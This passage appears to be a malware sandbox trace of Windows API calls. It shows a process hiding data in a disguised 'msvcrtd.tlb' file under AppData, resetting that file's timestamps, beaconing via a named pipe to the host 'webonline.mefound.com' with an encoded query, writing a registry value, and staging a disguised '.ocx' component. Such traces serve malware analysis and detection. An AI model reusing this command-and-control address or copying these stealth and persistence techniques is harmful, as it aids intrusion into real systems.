lpDistanceToMoveHigh=0x0) returned 0x197 [0053.599] GetLastError () returned 0xb7 [0053.599] SetLastError (dwErrCode=0xb7) [0053.599] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x172a834*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172a834*=0) returned 0x197 [0053.599] WriteFile (in: hFile=0x140, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x172a86c, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x172a86c*=0x37, lpOverlapped=0x0) returned 1 [0053.599] CloseHandle (hObject=0x140) returned 1 [0053.600] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0053.600] SetFileTime (hFile=0x140, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0053.600] CloseHandle (hObject=0x140) returned 1 [0053.600] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0053.600] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x144 [0053.600] SetNamedPipeHandleState (hNamedPipe=0x140, lpMode=0x172e524, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0053.600] GetTickCount () returned 0x1c5fc [0053.600] GetLastError () returned 0x0 [0053.600] SetLastError (dwErrCode=0x0) [0053.600] GetLastError () returned 0x0 [0053.600] SetLastError (dwErrCode=0x0) [0053.600] GetLastError () returned 0x0 [0053.600] SetLastError (dwErrCode=0x0) [0053.600] GetLastError () returned 0x0 [0053.600] SetLastError (dwErrCode=0x0) [0053.600] GetLastError () returned 0x0 [0053.601] SetLastError (dwErrCode=0x0) [0053.601] GetLastError () returned 0x0 [0053.601] SetLastError (dwErrCode=0x0) [0053.601] GetLastError () returned 0x0 [0053.601] SetLastError (dwErrCode=0x0) [0053.601] GetLastError () returned 0x0 [0053.601] SetLastError (dwErrCode=0x0) [0053.601] GetLastError () returned 0x0 [0053.601] SetLastError (dwErrCode=0x0) [0053.601] GetLastError () returned 0x0 [0053.601] SetLastError (dwErrCode=0x0) [0053.601] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2ac, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148 [0053.601] GetFileType (hFile=0x148) returned 0x1 [0053.601] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1ce [0053.602] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ce [0053.602] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3d8 | out: lpSystemTimeAsFileTime=0x172c3d8*(dwLowDateTime=0xed894dd0, dwHighDateTime=0x1d3dfba)) [0053.602] GetLastError () returned 0xb7 [0053.602] SetLastError (dwErrCode=0xb7) [0053.602] GetLastError () returned 0xb7 [0053.602] SetLastError (dwErrCode=0xb7) [0053.602] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x172c2c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172c2c0*=0) returned 0x1ce [0053.602] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ce [0053.602] GetLastError () returned 0xb7 [0053.602] SetLastError (dwErrCode=0xb7) [0053.602] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x172a820*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172a820*=0) returned 0x1ce [0053.602] WriteFile (in: hFile=0x148, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x172a858, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x172a858*=0x74, lpOverlapped=0x0) returned 1 [0053.602] CloseHandle (hObject=0x148) returned 1 [0053.603] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148 [0053.603] SetFileTime (hFile=0x148, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0053.603] CloseHandle (hObject=0x148) returned 1 [0053.603] strlen (_Str="webonline.mefound.com") returned 0x15 [0053.603] strlen (_Str="index/index.php?h=TQz6H5GI8zI%3d&d=TQz%2f%2fCqWZDJNDfUup77CB3U%2bzyihu8MGfTz6H5GI8zJNDPofkYh%3d") returned 0x5f [0053.603] WriteFile (in: hFile=0x140, lpBuffer=0x31d930*, nNumberOfBytesToWrite=0x8a, lpNumberOfBytesWritten=0x172e4f8, lpOverlapped=0x311230 | out: lpBuffer=0x31d930*, lpNumberOfBytesWritten=0x172e4f8*=0x8a, lpOverlapped=0x311230) returned 1 [0053.604] ReadFile (in: hFile=0x140, lpBuffer=0x171e538, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x171e534, lpOverlapped=0x311230 | out: lpBuffer=0x171e538*, lpNumberOfBytesRead=0x171e534*=0xd, lpOverlapped=0x311230) returned 1 [0066.669] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x7a120) returned 0x0 [0066.669] GetOverlappedResult (in: hFile=0x140, lpOverlapped=0x311230, lpNumberOfBytesTransferred=0x171e534, bWait=0 | out: lpNumberOfBytesTransferred=0x171e534) returned 1 [0066.669] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148 [0066.669] GetFileType (hFile=0x148) returned 0x1 [0066.669] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x242 [0066.669] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x242 [0066.669] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0xf5247290, dwHighDateTime=0x1d3dfba)) [0066.669] GetLastError () returned 0xb7 [0066.669] SetLastError (dwErrCode=0xb7) [0066.669] GetLastError () returned 0xb7 [0066.669] SetLastError (dwErrCode=0xb7) [0066.669] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x172c2e4*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172c2e4*=0) returned 0x242 [0066.669] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x242 [0066.670] GetLastError () returned 0xb7 [0066.670] SetLastError (dwErrCode=0xb7) [0066.670] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x172a844*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172a844*=0) returned 0x242 [0066.670] WriteFile (in: hFile=0x148, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x172a87c, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x172a87c*=0x2a, lpOverlapped=0x0) returned 1 [0066.670] CloseHandle (hObject=0x148) returned 1 [0066.671] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148 [0066.671] SetFileTime (hFile=0x148, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0066.671] CloseHandle (hObject=0x148) returned 1 [0066.671] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x148, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0066.672] RegSetValueExA (in: hKey=0x148, lpValueName="FGcnt", Reserved=0x0, dwType=0x4, lpData=0x172e540*=0x0, cbData=0x4 | out: lpData=0x172e540*=0x0) returned 0x0 [0066.672] RegCloseKey (hKey=0x148) returned 0x0 [0066.672] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x148, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0066.672] RegQueryValueExA (in: hKey=0x148, lpValueName="FGcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0066.672] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0066.672] GetFileType (hFile=0x14c) returned 0x1 [0066.672] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x26c [0066.672] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x26c [0066.672] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0xf5247290, dwHighDateTime=0x1d3dfba)) [0066.672] GetLastError () returned 0xb7 [0066.672] SetLastError (dwErrCode=0xb7) [0066.672] GetLastError () returned 0xb7 [0066.672] SetLastError (dwErrCode=0xb7) [0066.672] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x172c2e8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172c2e8*=0) returned 0x26c [0066.673] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x26c [0066.673] GetLastError () returned 0xb7 [0066.673] SetLastError (dwErrCode=0xb7) [0066.673] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x172a848*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172a848*=0) returned 0x26c [0066.673] WriteFile (in: hFile=0x14c, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x172a880, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x172a880*=0x1d, lpOverlapped=0x0) returned 1 [0066.673] CloseHandle (hObject=0x14c) returned 1 [0066.673] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0066.674] SetFileTime (hFile=0x14c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0066.674] CloseHandle (hObject=0x14c) returned 1 [0066.674] CloseHandle (hObject=0x140) returned 1 [0066.674] CloseHandle (hObject=0x144) returned 1 [0066.674] WaitForSingleObject (hHandle=0x11c, dwMilliseconds=0xea60) returned 0x0 [0066.674] GetLastError () returned 0x0 [0066.674] wsprintfA (in: param_1=0x172ebbc, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0066.674] wsprintfA (in: param_1=0x172e974, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\78f5d1ae4590aa11.tmp") returned 57 [0066.674] lstrlenA (lpString="olestdmp.ocx") returned 12 [0066.674] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x172e974 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0066.674] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpString2="\\" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" [0066.674] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0066.674] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6F") returned 2 [0066.674] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned 37 [0066.674] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F" [0066.674] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6C") returned 2 [0066.674] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned 39 [0066.674] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F", lpString2="6C" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C" [0066.674] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="65") returned 2 [0066.674] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C") returned 41 [0066.674] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C", lpString2="65" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65" [0066.674] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="73") returned 2 [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65") returned 43 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65", lpString2="73" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573" [0066.675] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="74") returned 2 [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573") returned 45 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C6573", lpString2="74" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374" [0066.675] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="64") returned 2 [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374") returned 47 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374", lpString2="64" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464" [0066.675] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6D") returned 2 [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464") returned 49 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C65737464", lpString2="6D" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D" [0066.675] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="70") returned 2 [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D") returned 51 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D", lpString2="70" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70" [0066.675] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="2E") returned 2 [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70") returned 53 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D70", lpString2="2E" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E" [0066.675] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6F") returned 2 [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E") returned 55 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F" [0066.675] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="63") returned 2 [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F") returned 57 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F", lpString2="63" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63" [0066.675] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="78") returned 2 [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63") returned 59 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F63", lpString2="78" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378" [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378") returned 61 [0066.675] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378", lpString2="FF.tmp" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" [0066.675] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", lpFindFileData=0x172ea7c | out: lpFindFileData=0x172ea7c) returned 0xffffffff [0066.675] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp", lpFindFileData=0x172ea7c | out: lpFindFileData=0x172ea7c) returned 0xffffffff [0066.675] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0066.675] wsprintfA (in: param_1=0x172ddf0, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0066.675] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\olestdmp.ocx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.675] GetLastError () returned 0x2 [0066.675] GetFileSize (in: hFile=0xffffffff, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xffffffff [0066.676] GetLastError () returned 0x6 [0066.676] GetLastError () returned 0x6 [0066.676] GetLastError () returned 0x6 [0066.676] GetLastError () returned 0x6 [0066.676] GetLastError () returned 0x6 [0066.676] GetLastError () returned 0x6 [0066.676] GetLastError () returned 0x6 [0066.676] GetLastError () returned 0x6 [0066.676] SetFileAttributesA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx", dwFileAttributes=0x80) returned 0 [0066.676] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0066.676] wsprintfA (in: param_1=0x172dffc, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0066.676] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\olestdmp.ocx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0066.676] SetFilePointer (in: hFile=0x144, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.676] ReadFile (in: hFile=0x144, lpBuffer=0x172ded4, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x172ded0, lpOverlapped=0x0 | out: lpBuffer=0x172ded4*, lpNumberOfBytesRead=0x172ded0*=0x0, lpOverlapped=0x0) returned 1 [0066.676] GetFileSize (in: hFile=0x144, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0066.676] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x172e114, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0066.676] wsprintfA (in: param_1=0x172e21c, param_2="%s\\Help\\%s\\%s" | out: param_1="C:\\ProgramData\\Help\\system32\\mskfp32.ocx") returned 40 [0066.676] wsprintfA (in: param_1=0x172e42c, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0066.676] FindFirstFileA (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx", lpFindFileData=0x172ddb8 | out: lpFindFileData=0x172ddb8) returned 0x358d80 [0066.676] FindClose (in: hFindFile=0x358d80 | out: hFindFile=0x358d80) returned 1 [0066.677] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172baf0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0066.677] GetFileType (hFile=0x140) returned 0x1 [0066.677] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x289 [0066.677] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x289 [0066.677] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172bc1c | out: lpSystemTimeAsFileTime=0x172bc1c*(dwLowDateTime=0xf526d3f0, dwHighDateTime=0x1d3dfba)) [0066.677] GetLastError () returned 0xb7 [0066.677] SetLastError (dwErrCode=0xb7) [0066.677] GetLastError () returned 0xb7 [0066.677] SetLastError (dwErrCode=0xb7) [0066.677] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x172bb04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172bb04*=0) returned 0x289 [0066.677] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x289 [0066.677] GetLastError () returned 0xb7 [0066.678] SetLastError (dwErrCode=0xb7) [0066.678] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x172a064*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x172a064*=0) returned 0x289 [0066.678] WriteFile (in: hFile=0x140, lpBuffer=0x303378*, nNumberOfBytesToWrite=0x97, lpNumberOfBytesWritten=0x172a09c, lpOverlapped=0x0 | out: lpBuffer=0x303378*, lpNumberOfBytesWritten=0x172a09c*=0x97, lpOverlapped=0x0) returned 1 [0066.678] CloseHandle (hObject=0x140) returned 1 [0066.679] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0066.679] SetFileTime (hFile=0x140, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0066.679] CloseHandle (hObject=0x140) returned 1 [0066.679] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x172dc4c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0066.679] GetTempFileNameA (in: lpPathName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpPrefixString="~fgh", uUnique=0x0, lpTempFileName=0x172db44 | out: 